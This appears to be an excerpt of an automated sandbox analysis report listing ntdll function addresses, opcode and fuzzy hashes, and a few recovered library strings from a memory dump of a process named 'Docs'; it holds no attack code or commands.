                                                              Function 015E2AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: acfc12ad81d81229b1b6f92d0f336eb6cfd1308c4310275d81b4921e87cf54c9
                                                              • Instruction ID: dd58f21ec59b52031ce87f5913dc17aad6f4156e0f3a5d5b583d08ba80b3dd7d
                                                              • Opcode Fuzzy Hash: acfc12ad81d81229b1b6f92d0f336eb6cfd1308c4310275d81b4921e87cf54c9
                                                              • Instruction Fuzzy Hash: D29002A1201540924900B2588404B0A4545E7E1211B59C41AE2454960CC665C9659235
                                                              Function 015E2D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0e9076287c5dd130fc5059f7405ea8df75628fc9701ba1ef9f02754a202552fe
                                                              • Instruction ID: c360d13b1aa07eecf759689180e49c5fd820626c9539402066adfb871a3a5da9
                                                              • Opcode Fuzzy Hash: 0e9076287c5dd130fc5059f7405ea8df75628fc9701ba1ef9f02754a202552fe
                                                              • Instruction Fuzzy Hash: 2A90022921340002D5807158540860A0045E7D2212F99D819A1415958CCA55C97D5321
                                                              Function 015E2D00 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 201c64ee9fb9dd8a6629e3865507532926fae8164b32dc3eafbb3fe24a0df28d
                                                              • Instruction ID: 1630573b802174b7b3c74e1393f28340896bcb95a28589d1b2fc556de0791573
                                                              • Opcode Fuzzy Hash: 201c64ee9fb9dd8a6629e3865507532926fae8164b32dc3eafbb3fe24a0df28d
                                                              • Instruction Fuzzy Hash: E390022120544442D50075585408A060045E7D1215F59D415A2464995DC775C965A231
                                                              Function 015E2D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7f7b6da07615d885aede9b908f31f9c1ef784f820c56a045e3c221267342fb66
                                                              • Instruction ID: f8d1a74bff9db89bd23e2012b10e3ea3adc276b4297d855ce802f05e4bdaca93
                                                              • Opcode Fuzzy Hash: 7f7b6da07615d885aede9b908f31f9c1ef784f820c56a045e3c221267342fb66
                                                              • Instruction Fuzzy Hash: 1F90022130140003D540715854186064045F7E2311F59D415E1814954CDA55C96A5322
                                                              Function 015E2DD0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8d1e3aef3fa6c0c960e85f2596305ba08debdc88199295c9512731a16715cfde
                                                              • Instruction ID: b80dbb9a21f128c9a447c68ac2a862c4d73916438f4d5fc71643ed023c7e1f3b
                                                              • Opcode Fuzzy Hash: 8d1e3aef3fa6c0c960e85f2596305ba08debdc88199295c9512731a16715cfde
                                                              • Instruction Fuzzy Hash: A0900221242441525945B15844045074046F7E1251799C416A2814D50CC666D96AD721
                                                              Function 015E2DB0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 059d8e77bd0761c21c2715869ae28828f313bd634f7e4db1e178a2067cea6b2d
                                                              • Instruction ID: 9622fa0ae5fbc3dcb18f5f910445527bfa2c4304d50526a5c789e25d437f9afd
                                                              • Opcode Fuzzy Hash: 059d8e77bd0761c21c2715869ae28828f313bd634f7e4db1e178a2067cea6b2d
                                                              • Instruction Fuzzy Hash: 4F90023124140402D541715844046060049F7D1251F99C416A1824954EC795CB6AAB61
                                                              Function 015E2C60 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8f425856d75f902c976536d1418c9dccae26d6f05f3ffe5229524983ec5b2d72
                                                              • Instruction ID: 1278b8da2db693a8db0366ff188dda21bdc2bec349a29221d4e255824f959ef5
                                                              • Opcode Fuzzy Hash: 8f425856d75f902c976536d1418c9dccae26d6f05f3ffe5229524983ec5b2d72
                                                              • Instruction Fuzzy Hash: 4990023120140842D50071584404B460045E7E1311F59C41AA1524A54DC755C9657621
                                                              Function 015E2CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4d8f6420bdc23e5df7fd6569fc547e67f5c24eb711dbd134dbdf7ee6849cd838
                                                              • Instruction ID: 66a78f29bbf1fccc795b8f6b7463a6d6de38761a84739956f80b839d174a8fb5
                                                              • Opcode Fuzzy Hash: 4d8f6420bdc23e5df7fd6569fc547e67f5c24eb711dbd134dbdf7ee6849cd838
                                                              • Instruction Fuzzy Hash: 9490022160540402D540715854187060055E7D1211F59D415A1424954DC799CB6967A1
                                                              Function 015E2CF0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 26d1e2fb5f23538e30e83d295f66b93dd9fe3949ddc632b00698e2795b96bba4
                                                              • Instruction ID: 460ff14e2501f4bf663d63dd26bf631d0fba57a67fad69e6fe7f0067281c15ed
                                                              • Opcode Fuzzy Hash: 26d1e2fb5f23538e30e83d295f66b93dd9fe3949ddc632b00698e2795b96bba4
                                                              • Instruction Fuzzy Hash: F190023120140403D500715855087070045E7D1211F59D815A1824958DD796C9656221
                                                              Function 015E2CA0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7abb66835b867c8b763445104fda1915eb056d18efa8453181a0ed38e5ece5ef
                                                              • Instruction ID: 313da631dc90c17d997dfa02c949b8b6be696d450951c6a56377f47678f56c87
                                                              • Opcode Fuzzy Hash: 7abb66835b867c8b763445104fda1915eb056d18efa8453181a0ed38e5ece5ef
                                                              • Instruction Fuzzy Hash: CB90023120140402D500759854086460045E7E1311F59D415A6424955EC7A5C9A56231
                                                              Function 015E2F60 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 07b21c9c9f4cab476d044b7a59e57905448de7150d97a026fcf2c245d6d42725
                                                              • Instruction ID: a47c0ab1a1240ec7f3331eff7beae05bf571bcfb2f81fa5740a8d75a6d362347
                                                              • Opcode Fuzzy Hash: 07b21c9c9f4cab476d044b7a59e57905448de7150d97a026fcf2c245d6d42725
                                                              • Instruction Fuzzy Hash: 9290026121140042D504715844047060085E7E2211F59C416A3554954CC669CD755225
                                                              Function 015E2F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 37ac3e1f4f9a80171be43d2a2abddf4151378c2b9eb048b4e322f8dc68ba4762
                                                              • Instruction ID: 17f1f69718f42ac034ccc462c7b7353c955d158648946190f5b963f55bf28dbc
                                                              • Opcode Fuzzy Hash: 37ac3e1f4f9a80171be43d2a2abddf4151378c2b9eb048b4e322f8dc68ba4762
                                                              • Instruction Fuzzy Hash: 1B90026134140442D50071584414B060045E7E2311F59C419E2464954DC759CD666226
                                                              Function 015E2FE0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6146b53a90b08ef6d08745c93f030a5986adafe104908404ea0ad90fd539c3b0
                                                              • Instruction ID: 6ae5b225b006c9b8aff1df121d1ff3b3d29e0d885b0966efc88e9848db14d20e
                                                              • Opcode Fuzzy Hash: 6146b53a90b08ef6d08745c93f030a5986adafe104908404ea0ad90fd539c3b0
                                                              • Instruction Fuzzy Hash: 3A900221211C0042D60075684C14B070045E7D1313F59C519A1554954CCA55C9755621
                                                              Function 015E2F90 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fd060379eb2f1bb65f213dadb96c224c123d0bb716caf54e3d2a8180961166e0
                                                              • Instruction ID: cda687ccf70b5fdc325429613bdf85ff642804ccbdd53906eb6502b118c3bc38
                                                              • Opcode Fuzzy Hash: fd060379eb2f1bb65f213dadb96c224c123d0bb716caf54e3d2a8180961166e0
                                                              • Instruction Fuzzy Hash: E890023120180402D5007158481470B0045E7D1312F59C415A2564955DC765C9656671
                                                              Function 015E2FB0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: de2751416e27a85890c2dac091f4e74a46b91892be33028c96814616202a159c
                                                              • Instruction ID: 45cf80b88893e66c4f6b7bf1b928fb144a20d4451cf405e7ab94a075b3325e85
                                                              • Opcode Fuzzy Hash: de2751416e27a85890c2dac091f4e74a46b91892be33028c96814616202a159c
                                                              • Instruction Fuzzy Hash: C6900221601400424540716888449064045FBE2221759C525A1D98950DC699C9795765
                                                              Function 015E2FA0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6663065a2335922397552c71e41ee26ee9a2778ebf0d339831bad950e05a391a
                                                              • Instruction ID: 851ff09026d3d419d89018b763a224e1d2409b7543577f1431cf08150d3e48ce
                                                              • Opcode Fuzzy Hash: 6663065a2335922397552c71e41ee26ee9a2778ebf0d339831bad950e05a391a
                                                              • Instruction Fuzzy Hash: 6990023120180402D500715848087470045E7D1312F59C415A6564955EC7A5C9A56631
                                                              Function 015E2E30 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 35a80261d14cd4abbc7b6bf1f8b2f4f55fd28432e12a8f78728290228a03ea2a
                                                              • Instruction ID: 04d5aac6ba1d06dc331bb2c5194a38e57d0a4f26e600823f61eeb9495919b5c0
                                                              • Opcode Fuzzy Hash: 35a80261d14cd4abbc7b6bf1f8b2f4f55fd28432e12a8f78728290228a03ea2a
                                                              • Instruction Fuzzy Hash: 4E90022130140402D502715844146060049E7D2355F99C416E2824955DC765CA67A232
                                                              Function 015E2EE0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6ecbfdca68264873a2784261b44a6c42ad31c0db0d5aa443b6d3b61e9814c945
                                                              • Instruction ID: 73cb450efdaa118c992c9d7a8edef67ab9ca8d804092ff50a0341cb978ca0db9
                                                              • Opcode Fuzzy Hash: 6ecbfdca68264873a2784261b44a6c42ad31c0db0d5aa443b6d3b61e9814c945
                                                              • Instruction Fuzzy Hash: 2390026120180403D540755848046070045E7D1312F59C415A3464955ECB69CD656235
                                                              Function 015E2E80 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 099f26de2676e9cac673516a4c2a52fd6440c2869945f9bc5eee4e2b922badf3
                                                              • Instruction ID: df5e6c92caff67f8038d4ca0bdf73e1cc1f0d34029727014a295ea2398930705
                                                              • Opcode Fuzzy Hash: 099f26de2676e9cac673516a4c2a52fd6440c2869945f9bc5eee4e2b922badf3
                                                              • Instruction Fuzzy Hash: 5990022160140502D50171584404616004AE7D1251F99C426A2424955ECB65CAA6A231
                                                              Function 015E2EA0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fdc87de22c98723c0a25403933ba7f987e3a700f6b22cf9a07de228556e39139
                                                              • Instruction ID: 2181060ba03b64e4a85f407e5eb14a0ccd8b2a3505a2c6f6d21b4081caae3fd9
                                                              • Opcode Fuzzy Hash: fdc87de22c98723c0a25403933ba7f987e3a700f6b22cf9a07de228556e39139
                                                              • Instruction Fuzzy Hash: 5F90027120140402D540715844047460045E7D1311F59C415A6464954EC799CEE96765
                                                              Function 015E3010 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ec50d3fe3aaa522044bbae71e914dc74e69c1e156baec55f4e38077cbca42883
                                                              • Instruction ID: afa0988c0c8fed295e4140ccb36ce5b5a4b6534d45a32e8ecb390e5dd0cc3959
                                                              • Opcode Fuzzy Hash: ec50d3fe3aaa522044bbae71e914dc74e69c1e156baec55f4e38077cbca42883
                                                              • Instruction Fuzzy Hash: 3990022120184442D54072584804B0F4145E7E2212F99C41DA5556954CCA55C9695721
                                                              Function 015E3090 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b7e1e95b324f1bfe9c0a39f048c18015398d376437f8b2c7e0aa5fd98c7297c8
                                                              • Instruction ID: 30ffc61e4513a1bc317213b5e8af9bba14760cfa97542d4ee73aa2ccc25ba936
                                                              • Opcode Fuzzy Hash: b7e1e95b324f1bfe9c0a39f048c18015398d376437f8b2c7e0aa5fd98c7297c8
                                                              • Instruction Fuzzy Hash: 4890022124140802D540715884147070046E7D1611F59C415A1424954DC756CA7967B1
                                                              Function 015E39B0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3c9ef9925ac3fe4842dd6fe82b206730aea3742623361fc8927f906d588901d2
                                                              • Instruction ID: c8f4c5f070e7d877ee5dc7c750da11c88bb36362a26e58fe1b9c7f64a13724bf
                                                              • Opcode Fuzzy Hash: 3c9ef9925ac3fe4842dd6fe82b206730aea3742623361fc8927f906d588901d2
                                                              • Instruction Fuzzy Hash: 1190022124545102D550715C44046164045F7E1211F59C425A1C14994DC695C9696321
                                                              Function 015E3D70 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fa4fb9d7a42b94340692b2f0d967a6333a276a6d288aba42f8caacadfc329197
                                                              • Instruction ID: 7e6f0f1ad742eb9dc54c70849561dc814ef21d75bece0c2d087825b19316f8cb
                                                              • Opcode Fuzzy Hash: fa4fb9d7a42b94340692b2f0d967a6333a276a6d288aba42f8caacadfc329197
                                                              • Instruction Fuzzy Hash: 6E90023520140402D910715858046460086E7D1311F59D815A1824958DC794C9B5A221
                                                              Function 015E3D10 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e91ad2f4f834913d89a9dae64b5a23d653481bb42571b09940c7ba87d3636b04
                                                              • Instruction ID: a112544ae882b583cccf405e31b6ccf7a1fd16917cb328c2e90362330899273e
                                                              • Opcode Fuzzy Hash: e91ad2f4f834913d89a9dae64b5a23d653481bb42571b09940c7ba87d3636b04
                                                              • Instruction Fuzzy Hash: 0190023120240142994072585804A4E4145E7E2312B99D819A1415954CCA54C9755321
                                                              Function 015E2C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                              • Instruction ID: 77b8beae4a28986b96b67566907d6afa8240a6c534fa2fe420176292c5d37bc4
                                                              • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                              • Instruction Fuzzy Hash:
                                                              Function 015E2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                              • API String ID: 48624451-2108815105
                                                              • Opcode ID: 330c1ad558e58612efa87d7167b275dc8ec98c666b876f25348a944aa08fd141
                                                              • Instruction ID: 1086b1e93a157f635e3547459174d4960ddaed1900142110c391427b14a4d478
                                                              • Opcode Fuzzy Hash: 330c1ad558e58612efa87d7167b275dc8ec98c666b876f25348a944aa08fd141
                                                              • Instruction Fuzzy Hash: 985116B6E04256AFCB15DFAC8C8497EFBFCBB48240B548169F455DB649D334DE4087A0
                                                              Function 01652410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                              • API String ID: 48624451-2108815105
                                                              • Opcode ID: 00cfebeb43dede21c6cbb94e61292669edac3947fdd2d9f2393dcbca8799a58a
                                                              • Instruction ID: 25880c8c99db5c2caf385e76717894a4c3adbd8574b40d1feb5fd1783398754a
                                                              • Opcode Fuzzy Hash: 00cfebeb43dede21c6cbb94e61292669edac3947fdd2d9f2393dcbca8799a58a
                                                              • Instruction Fuzzy Hash: 2D51E675A00646EECB64DF6CCCA097EBBF9EB44204F04845DE9D6D7642E7B4DA408760
                                                              Function 015D7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01614725
                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01614742
                                                              • Execute=1, xrefs: 01614713
                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01614655
                                                              • ExecuteOptions, xrefs: 016146A0
                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 016146FC
                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 01614787
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                              • API String ID: 0-484625025
                                                              • Opcode ID: 3df0f738fcf051c52f9863b83bbb06b36a9b3ba543be2226ed3df548dcc35fc9
                                                              • Instruction ID: 3e3af68dcfec34329da07cc4a737dba287b182ec3f5d4faacc26ed7f564bcd3b
                                                              • Opcode Fuzzy Hash: 3df0f738fcf051c52f9863b83bbb06b36a9b3ba543be2226ed3df548dcc35fc9
                                                              • Instruction Fuzzy Hash: FB510A31A0021A7AEF21EAADDC85FAD7BB8FF59708F140499D505AF181EB709A41CF50
                                                              Function 01676940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                              • Instruction ID: c3d9a0ad121311c15e6bac2221be187e4645d4cbbee304d686ae8ec8fd646ba7
                                                              • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                              • Instruction Fuzzy Hash: AE022571508742AFE309DF18C894A6BBBE5FFD8704F04896DF9898B264DB31E905CB52
                                                              Function 015EB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID: __aulldvrm
                                                              • String ID: +$-$0$0
                                                              • API String ID: 1302938615-699404926
                                                              • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                              • Instruction ID: e1238378e3c1e77f0c3316ecc386b3fa13d3cec6074cdffeb004e94b30e5a8f9
                                                              • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                              • Instruction Fuzzy Hash: 7581E170E4524A8EEF2D8E6CC8587FEBBF1BF45322F18465AD851AF691C7308840CB51
                                                              Function 016520E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
